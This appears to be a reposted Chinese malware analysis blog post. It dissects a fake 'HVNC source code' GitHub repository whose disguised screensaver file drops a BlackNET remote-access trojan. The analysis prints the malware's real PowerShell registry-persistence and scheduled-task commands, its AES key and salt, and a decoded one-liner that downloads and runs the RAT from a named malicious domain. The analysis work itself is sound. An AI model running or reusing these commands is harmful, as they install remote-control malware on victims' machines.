起因
网上冲浪的时候,看到篇帖子说pandora hvnc的源码泄露了,于是去github上一搜发现一堆疑似源码的仓库,并且大多数都有十个以上的start,愉快的clone下来,发现hidden vnc full not pasted.sln的文件杀软报毒了。类型是屏幕保护程序,图标也不太对劲,于是对其分析一波。
前置程序分析一级程序
通过分析知道,此程序的后缀为scr,但用了FileSpoofer技术显示了假的扩展名(详见参考链接1)。
拖入die,显示为.net程序。
拖入dnspy,程序被简单混淆,直接使用de4dot反混淆后再次打开,其中Main函数:
全部字符串进行base64加密,进行动态调试分析:
Class0.smethod_3():
首先判断程序是否为
C:UsersxxxxxAppDataRoamingWindowsDefenderScreenWindowsDefenderScreen.exe,如果不是则创建相关路径,关闭相关程序并复制文件到此目录。
然后运行PowerShell命令进行开机启动设置:
代码语言:javascript代码运行次数:0运行复制
代码语言:javascript代码运行次数:0运行复制
"Remove -ItemProperty -Path 'HKCU:SOFTWAREMicrosoftWindowsCurrentVersionRun' -Name 'WindowsDefenderScreen';New-ItemProperty -Path 'HKCU:SOFTWAREMicrosoftWindowsCurrentVersionRun' -Name 'WindowsDefenderScreen' -Value '""C:UsersxxxxxAppDataRoamingWindowsDefenderScreenWindowsDefenderScreen.exe""' -PropertyType 'String'"(向右滑动,查看更多)
判断是否为Administrator权限,根据权限不同,利用任务计划进行权限维持
代码语言:javascript代码运行次数:0运行复制
是Administrator权限:cmd /C schtasks /create /tn WindowsDefenderScreen /tr "C:UsersxxxxxAppDataRoamingWindowsDefenderScreenWindowsDefenderScreen.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f(向右滑动,查看更多)非Administrator权限:代码语言:javascript代码运行次数:0运行复制
cmd /C schtasks /create /tn WindowsDefenderScreen /tr "C:UsersxxxxxAppDataRoamingWindowsDefenderScreenWindowsDefenderScreen.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /f(向右滑动,查看更多)代码语言:javascript代码运行次数:0运行复制
接下来进入正常执行流程:
首先通过GetManifestResourceStream获取rZJsQDE9Fv的资源文件,然后对资源文件进行解密,用的AES算法,其中密钥为zEP2yn51xz,salt为{26,20,202,234,136,123,69,47},模式为CBC,具体可以看下图:
解密后会通过注入到
C:WindowsMicrosoft.NETFrameworkv4.0.30319RegAsm.exe运行,这里直接将解密数据提取分析。
二级程序
上面提取出来的程序如下:
此程序主要是通过ShellExecuteA与EnumResourceNamesA释放并打开C:UsersxxxxxAppDataRoamingHYPERVISOR.SLN
代码小浣熊
代码小浣熊是基于商汤大语言模型的软件智能研发助手,覆盖软件需求分析、架构设计、代码编写、软件测试等环节
51 查看详情
C:UsersxxxxxAppDataRoamingWINDOWSDEFENDERSCREEN.EXE造成是正常Visual Studio工程的假象。
三级与四级
二级程序释放的新的WINDOWSDEFENDERSCREEN.EXE是一个.net程序,程序逻辑和第一个.net程序完全一样只是资源文件变了,提取出四级程序,和二级程序一样释放资源文件这次一共释放了10个.net文件:
每个文件都是使用PowerShell运行base64编码后的代码,以BLACK.exe为例:
解码后代码:
代码语言:javascript代码运行次数:0运行复制
代码语言:javascript代码运行次数:0运行复制
Start-Sleep -Seconds 10;(New-Object System.Net.WebClient).DownloadFile('https://zenginlerclubmuck.xyz/DontDelete/Blacknet/l/blacknet%20L.exe', (Join-Path -Path $env:AppData -ChildPath 'Black.exe')); Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'Black.exe')(向右滑动,查看更多)代码语言:javascript代码运行次数:0运行复制
通过网络下载远控程序。
前置程序利用了大量的程序间调用,意图躲避杀软:
远程控制分析
zenginlerclubmuck.xyz的网站已经连接不上了,只能查到相关缓存。
通过一顿查找找到了
https://zenginlerclubmuck.xyz/DontDelete/Blacknet/p/black P.exe的文件缓存。
又是一个.net程序,de4dot能识别为Babel.Net但无法反混淆,在dnspy中查看类型引用,发现GZipStream,猜测用来解压缩Payload,便在此处下断点进行动态调试,在断点处停止后,代码已经出来了。
这里CheckFile 是将文件放在
C:UsersxxxxxxAppDataRoamingWindows SecurityWindows Security.exe 并添加开机自启。
后面通过Gzip解压缩Payload,直接提取rawAssembly与array3,主要恶意程序在array3中。
可以知道这个程序包括了虚拟机判断,屏幕截图,键盘记录,凭据窃取,DDOS等功能。
通过对其特征判断,很明显这是基于BlackNET RAT制作恶意程序,对详细技术感兴趣的可以去看参考链接中的2,3。
参考链接:
以上就是伪装成HVNC源码的恶意软件分析的详细内容,更多请关注创想鸟其它相关文章!
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 chuangxiangniao@163.com 举报,一经查实,本站将立刻删除。
发布者:程序猿,转转请注明出处:https://www.chuangxiangniao.com/p/411750.html
微信扫一扫 
支付宝扫一扫 
